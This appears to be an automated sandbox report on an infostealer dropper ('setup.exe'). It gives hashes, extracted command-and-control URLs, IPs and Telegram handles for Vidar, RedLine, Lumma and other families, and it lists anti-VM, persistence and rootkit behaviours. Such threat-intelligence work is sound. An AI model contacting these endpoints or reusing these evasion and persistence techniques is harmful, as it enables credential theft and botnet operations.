Resubmissions
15-04-2024 19:48
240415-yjb28sgh2y 1015-04-2024 19:06
240415-xsd3hsdf75 715-04-2024 19:02
240415-xpws6afh4x 1015-04-2024 18:45
240415-xecmjadd57 1015-04-2024 18:42
240415-xcbbpaff61 1015-04-2024 18:39
240415-xaqctsff5v 1015-04-2024 18:35
240415-w8gb5sff3w 1015-04-2024 18:27
240415-w315csfe2x 1015-04-2024 18:23
240415-w1w3mafd5t 715-04-2024 18:10
240415-wsg9hach35 7Analysis
-
max time kernel
576s -
max time network
582s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
15-04-2024 18:45
Behavioral task
behavioral1
Sample
archive-150424-06_04_17.rar
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
archive-150424-06_04_17.rar
Resource
win10v2004-20240412-en
Behavioral task
behavioral3
Sample
hash.bin
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
hash.bin
Resource
win10v2004-20240412-en
Behavioral task
behavioral5
Sample
setup.exe
Resource
win10-20240404-en
Behavioral task
behavioral6
Sample
setup.exe
Resource
win10v2004-20240412-en
General
-
Target
setup.exe
-
Size
700.0MB
-
MD5
6d23d8dee5299700881a3e484eef8a9c
-
SHA1
43b0c7e5bea63447ef78225d76fb47c6b29a4381
-
SHA256
9383433f5dd673392f5dc01b0a8e84e063bf182cdb46fa49000a0b890f448240
-
SHA512
c98754f41c3f094dc4d39f486c9ac0b6f91977258ba1a347c0914c00e47bf995398a5c4572a8ea5d529a28c12a71b6bfb09869bd9187416e31978440b33a4e87
-
SSDEEP
49152:GnjzX9RG5mnTDunfqNMP9Pyz6DMPCMTbzdZEmqyXVSY+wfdH1rFuzi56M/cH1oYI:OD9cSfX69PvQP1vFqyXHvsnM/PbQi
Malware Config
Extracted
vidar
https://steamcommunity.com/profiles/76561199673019888
https://t.me/irfail
https://t.me/de17fs
https://steamcommunity.com/profiles/76561199667616374
-
user_agent
Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.50:33080
Extracted
gcleaner
185.172.128.90
5.42.65.64
-
url_path
/advdlc.php
Extracted
lumma
https://greetclassifytalk.shop/api
https://entitlementappwo.shop/api
https://economicscreateojsu.shop/api
https://pushjellysingeywus.shop/api
https://absentconvicsjawun.shop/api
https://suitcaseacanehalk.shop/api
https://bordersoarmanusjuw.shop/api
https://mealplayerpreceodsju.shop/api
https://wifeplasterbakewis.shop/api
Extracted
socks5systemz
http://ebeidfo.ua/search/?q=67e28dd86d5df22d470fa41e7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f771ea771795af8e05c645db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608ffc13c0e895993f
http://ebeidfo.ua/search/?q=67e28dd86d5df22d470fa41e7c27d78406abdd88be4b12eab517aa5c96bd86e89d8f4f96148ab2865b77f80ebad9c40f7cb63037ed2ab423a4324383ba915d911ec07bb606a0708727e40ea678c45abbe74ffb0e2807e12571c17f3e83fe16c1ec979a3ccd6c92
Signatures
-
Detect Vidar Stealer 6 IoCs
Processes:
resource yara_rule behavioral6/memory/2868-290-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral6/memory/2868-344-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral6/memory/4308-374-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral6/memory/4308-356-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral6/memory/4308-306-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral6/memory/2868-301-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 -
Detect ZGRat V1 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\SimpleAdobe\kN3Wu8RUu2uTrcf2g49JbbJI.exe family_zgrat_v1 behavioral6/memory/3116-274-0x0000000000160000-0x000000000074C000-memory.dmp family_zgrat_v1 behavioral6/memory/4304-541-0x0000000000400000-0x00000000004C2000-memory.dmp family_zgrat_v1 behavioral6/memory/3488-550-0x0000000004D20000-0x000000000511A000-memory.dmp family_zgrat_v1 -
Glupteba payload 1 IoCs
Processes:
resource yara_rule behavioral6/memory/3488-565-0x0000000000400000-0x0000000003118000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 2 IoCs
Processes:
setup.exeGIRYqcKiZvhmj93nqNmYBOcU.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" setup.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" GIRYqcKiZvhmj93nqNmYBOcU.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
Processes:
resource yara_rule behavioral6/memory/2784-282-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral6/memory/4304-541-0x0000000000400000-0x00000000004C2000-memory.dmp family_redline -
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
setup.exeGIRYqcKiZvhmj93nqNmYBOcU.exeK3WDl2xWvNNnkfn4nYdQExzq.exee02CHlRDyVx8CisrSUbTQs_u.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GIRYqcKiZvhmj93nqNmYBOcU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ K3WDl2xWvNNnkfn4nYdQExzq.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e02CHlRDyVx8CisrSUbTQs_u.exe -
Blocklisted process makes network request 6 IoCs
Processes:
RegAsm.exerundll32.exeflow pid process 242 4308 RegAsm.exe 244 4308 RegAsm.exe 246 4308 RegAsm.exe 248 4308 RegAsm.exe 251 4308 RegAsm.exe 282 4868 rundll32.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 3988 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
setup.exeGIRYqcKiZvhmj93nqNmYBOcU.exeK3WDl2xWvNNnkfn4nYdQExzq.exee02CHlRDyVx8CisrSUbTQs_u.exeInstall.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GIRYqcKiZvhmj93nqNmYBOcU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion K3WDl2xWvNNnkfn4nYdQExzq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e02CHlRDyVx8CisrSUbTQs_u.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GIRYqcKiZvhmj93nqNmYBOcU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion K3WDl2xWvNNnkfn4nYdQExzq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e02CHlRDyVx8CisrSUbTQs_u.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
setup.exeInstall.exeP1i57rTqyYvK8Wz1_NY_lX0m.exeKRtjXHn.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation setup.exe Key value queried \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation P1i57rTqyYvK8Wz1_NY_lX0m.exe Key value queried \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation KRtjXHn.exe -
Executes dropped EXE 34 IoCs
Processes:
K3WDl2xWvNNnkfn4nYdQExzq.exes4AaUwLl6DEajYQi5WVeMPx0.exee02CHlRDyVx8CisrSUbTQs_u.exe4dLTrXqtftUhIwJTRyHSSejV.exeoqnIhEuqPWFLxfGfy_cozJKr.exegNaZnn5CLFQicjVhsTk8gKef.exekN3Wu8RUu2uTrcf2g49JbbJI.exeQcMIl6J7oMLzdIxc7BHVgaQ9.exeP1i57rTqyYvK8Wz1_NY_lX0m.exeGIRYqcKiZvhmj93nqNmYBOcU.exeNYulW0N4e1hPawIOp4plsa35.exeD3wSlOtntlkjBD387yaruAqa.exekwI5msI0GXCECMxCfATKQ50A.exetuZctSq25Sx46OCwloIdBXYG.exe9YVd8Opjg5kP29QMElKldZkn.exeis-VK0NS.tmpthreekingsoftvideo.exeInstall.exethreekingsoftvideo.exedckuybanmlgp.exeMczRWBv.exetuZctSq25Sx46OCwloIdBXYG.execsrss.exeKRtjXHn.exeinjector.exewindefender.exewindefender.exef5VHEXNHF974Dhcz8BdyX288.exef5VHEXNHF974Dhcz8BdyX288.exedcb505dc2b9d8aac05f4ca0727f5eadb.exewup.execsrss.exe713674d5e968cbe2102394be0b2bae6f.exe1bf850b4d9587c1017a75a47680584c4.exepid process 2668 K3WDl2xWvNNnkfn4nYdQExzq.exe 3520 s4AaUwLl6DEajYQi5WVeMPx0.exe 4492 e02CHlRDyVx8CisrSUbTQs_u.exe 4884 4dLTrXqtftUhIwJTRyHSSejV.exe 2772 oqnIhEuqPWFLxfGfy_cozJKr.exe 2104 gNaZnn5CLFQicjVhsTk8gKef.exe 3116 kN3Wu8RUu2uTrcf2g49JbbJI.exe 4744 QcMIl6J7oMLzdIxc7BHVgaQ9.exe 1368 P1i57rTqyYvK8Wz1_NY_lX0m.exe 4964 GIRYqcKiZvhmj93nqNmYBOcU.exe 4648 NYulW0N4e1hPawIOp4plsa35.exe 2268 D3wSlOtntlkjBD387yaruAqa.exe 4320 kwI5msI0GXCECMxCfATKQ50A.exe 3488 tuZctSq25Sx46OCwloIdBXYG.exe 884 9YVd8Opjg5kP29QMElKldZkn.exe 4784 is-VK0NS.tmp 3964 threekingsoftvideo.exe 3360 Install.exe 3792 threekingsoftvideo.exe 3548 dckuybanmlgp.exe 3520 MczRWBv.exe 580 tuZctSq25Sx46OCwloIdBXYG.exe 1496 csrss.exe 4808 KRtjXHn.exe 5076 injector.exe 1492 windefender.exe 396 windefender.exe 880 f5VHEXNHF974Dhcz8BdyX288.exe 4160 f5VHEXNHF974Dhcz8BdyX288.exe 1164 dcb505dc2b9d8aac05f4ca0727f5eadb.exe 4944 wup.exe 1076 csrss.exe 5020 713674d5e968cbe2102394be0b2bae6f.exe 5032 1bf850b4d9587c1017a75a47680584c4.exe -
Loads dropped DLL 5 IoCs
Processes:
is-VK0NS.tmpkN3Wu8RUu2uTrcf2g49JbbJI.exekwI5msI0GXCECMxCfATKQ50A.exerundll32.exepid process 4784 is-VK0NS.tmp 3116 kN3Wu8RUu2uTrcf2g49JbbJI.exe 4320 kwI5msI0GXCECMxCfATKQ50A.exe 4320 kwI5msI0GXCECMxCfATKQ50A.exe 4868 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral6/memory/4756-0-0x00007FF672630000-0x00007FF672E94000-memory.dmp themida behavioral6/memory/4756-5-0x00007FF672630000-0x00007FF672E94000-memory.dmp themida behavioral6/memory/4756-6-0x00007FF672630000-0x00007FF672E94000-memory.dmp themida behavioral6/memory/4756-7-0x00007FF672630000-0x00007FF672E94000-memory.dmp themida behavioral6/memory/4756-8-0x00007FF672630000-0x00007FF672E94000-memory.dmp themida behavioral6/memory/4756-9-0x00007FF672630000-0x00007FF672E94000-memory.dmp themida behavioral6/memory/4756-10-0x00007FF672630000-0x00007FF672E94000-memory.dmp themida behavioral6/memory/4756-11-0x00007FF672630000-0x00007FF672E94000-memory.dmp themida behavioral6/memory/4756-20-0x00007FF672630000-0x00007FF672E94000-memory.dmp themida behavioral6/memory/4756-28-0x00007FF672630000-0x00007FF672E94000-memory.dmp themida C:\Users\Admin\Documents\SimpleAdobe\GIRYqcKiZvhmj93nqNmYBOcU.exe themida behavioral6/memory/4756-189-0x00007FF672630000-0x00007FF672E94000-memory.dmp themida behavioral6/memory/4964-280-0x0000000000F80000-0x000000000154B000-memory.dmp themida behavioral6/memory/4964-287-0x0000000000F80000-0x000000000154B000-memory.dmp themida behavioral6/memory/4964-291-0x0000000000F80000-0x000000000154B000-memory.dmp themida behavioral6/memory/4964-362-0x0000000000F80000-0x000000000154B000-memory.dmp themida behavioral6/memory/4964-372-0x0000000000F80000-0x000000000154B000-memory.dmp themida behavioral6/memory/4964-351-0x0000000000F80000-0x000000000154B000-memory.dmp themida behavioral6/memory/4964-324-0x0000000000F80000-0x000000000154B000-memory.dmp themida behavioral6/memory/4756-303-0x00007FF672630000-0x00007FF672E94000-memory.dmp themida behavioral6/memory/4964-302-0x0000000000F80000-0x000000000154B000-memory.dmp themida -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 45.155.250.90 -
Processes:
resource yara_rule C:\Users\Admin\Documents\SimpleAdobe\s4AaUwLl6DEajYQi5WVeMPx0.exe vmprotect behavioral6/memory/3520-332-0x0000000000540000-0x0000000000E2E000-memory.dmp vmprotect behavioral6/memory/3520-561-0x0000000000540000-0x0000000000E2E000-memory.dmp vmprotect -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
tuZctSq25Sx46OCwloIdBXYG.execsrss.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
setup.exeGIRYqcKiZvhmj93nqNmYBOcU.exeK3WDl2xWvNNnkfn4nYdQExzq.exee02CHlRDyVx8CisrSUbTQs_u.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GIRYqcKiZvhmj93nqNmYBOcU.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA K3WDl2xWvNNnkfn4nYdQExzq.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA e02CHlRDyVx8CisrSUbTQs_u.exe -
Drops Chrome extension 2 IoCs
Processes:
KRtjXHn.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json KRtjXHn.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json KRtjXHn.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
KRtjXHn.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini KRtjXHn.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 62 bitbucket.org 71 bitbucket.org 80 bitbucket.org 105 bitbucket.org 187 iplogger.org 188 iplogger.org -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 32 ipinfo.io 192 api.myip.com 193 api.myip.com 194 ipinfo.io 195 ipinfo.io 25 api.myip.com 26 api.myip.com 31 ipinfo.io -
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 48 IoCs
Processes:
KRtjXHn.exepowershell.exepowershell.exepowershell.exesetup.exeGIRYqcKiZvhmj93nqNmYBOcU.exeMczRWBv.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol setup.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI setup.exe File opened for modification C:\Windows\System32\GroupPolicy GIRYqcKiZvhmj93nqNmYBOcU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft KRtjXHn.exe File opened for modification C:\Windows\System32\GroupPolicy setup.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini GIRYqcKiZvhmj93nqNmYBOcU.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI GIRYqcKiZvhmj93nqNmYBOcU.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini MczRWBv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 KRtjXHn.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA KRtjXHn.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol KRtjXHn.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini setup.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol MczRWBv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol GIRYqcKiZvhmj93nqNmYBOcU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 KRtjXHn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
setup.exeGIRYqcKiZvhmj93nqNmYBOcU.exeK3WDl2xWvNNnkfn4nYdQExzq.exee02CHlRDyVx8CisrSUbTQs_u.exepid process 4756 setup.exe 4964 GIRYqcKiZvhmj93nqNmYBOcU.exe 2668 K3WDl2xWvNNnkfn4nYdQExzq.exe 4492 e02CHlRDyVx8CisrSUbTQs_u.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
4dLTrXqtftUhIwJTRyHSSejV.exeQcMIl6J7oMLzdIxc7BHVgaQ9.exeD3wSlOtntlkjBD387yaruAqa.exeoqnIhEuqPWFLxfGfy_cozJKr.exekN3Wu8RUu2uTrcf2g49JbbJI.exedckuybanmlgp.exedescription pid process target process PID 4884 set thread context of 4088 4884 4dLTrXqtftUhIwJTRyHSSejV.exe RegAsm.exe PID 4744 set thread context of 2784 4744 QcMIl6J7oMLzdIxc7BHVgaQ9.exe RegAsm.exe PID 2268 set thread context of 2868 2268 D3wSlOtntlkjBD387yaruAqa.exe WerFault.exe PID 2772 set thread context of 4308 2772 oqnIhEuqPWFLxfGfy_cozJKr.exe cmd.exe PID 3116 set thread context of 4304 3116 kN3Wu8RUu2uTrcf2g49JbbJI.exe MsBuild.exe PID 3548 set thread context of 1520 3548 dckuybanmlgp.exe conhost.exe PID 3548 set thread context of 4708 3548 dckuybanmlgp.exe svchost.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
tuZctSq25Sx46OCwloIdBXYG.exef5VHEXNHF974Dhcz8BdyX288.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN tuZctSq25Sx46OCwloIdBXYG.exe File opened (read-only) \??\VBoxMiniRdrDN f5VHEXNHF974Dhcz8BdyX288.exe -
Drops file in Program Files directory 14 IoCs
Processes:
KRtjXHn.exedescription ioc process File created C:\Program Files (x86)\BcCQMXwjU\ofYmWRY.xml KRtjXHn.exe File created C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\IHGjrgy.dll KRtjXHn.exe File created C:\Program Files (x86)\ITFcQRBGgRUn\GqJCMDV.dll KRtjXHn.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak KRtjXHn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak KRtjXHn.exe File created C:\Program Files (x86)\SwHdQyPSnQdU2\SYMmSSiHCPLFo.dll KRtjXHn.exe File created C:\Program Files (x86)\SwHdQyPSnQdU2\IXDlPKV.xml KRtjXHn.exe File created C:\Program Files (x86)\BcCQMXwjU\YmSHPF.dll KRtjXHn.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi KRtjXHn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja KRtjXHn.exe File created C:\Program Files (x86)\mfOEuGwqkLFbC\ecRPzMw.dll KRtjXHn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi KRtjXHn.exe File created C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\fhVzBeL.xml KRtjXHn.exe File created C:\Program Files (x86)\mfOEuGwqkLFbC\Pnhdyer.xml KRtjXHn.exe -
Drops file in Windows directory 8 IoCs
Processes:
csrss.exeschtasks.exetuZctSq25Sx46OCwloIdBXYG.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\bXvtwaJkKQEzfXjvnG.job schtasks.exe File opened for modification C:\Windows\rss tuZctSq25Sx46OCwloIdBXYG.exe File created C:\Windows\rss\csrss.exe tuZctSq25Sx46OCwloIdBXYG.exe File created C:\Windows\Tasks\MVZgvzYKAFemhQpXL.job schtasks.exe File created C:\Windows\Tasks\fjXiyaIJtNnEyln.job schtasks.exe File created C:\Windows\Tasks\xxPoWeVRQBzFwCLPV.job schtasks.exe File created C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 4200 sc.exe 4480 sc.exe 4024 sc.exe 3524 sc.exe 2424 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 11 IoCs
Processes:
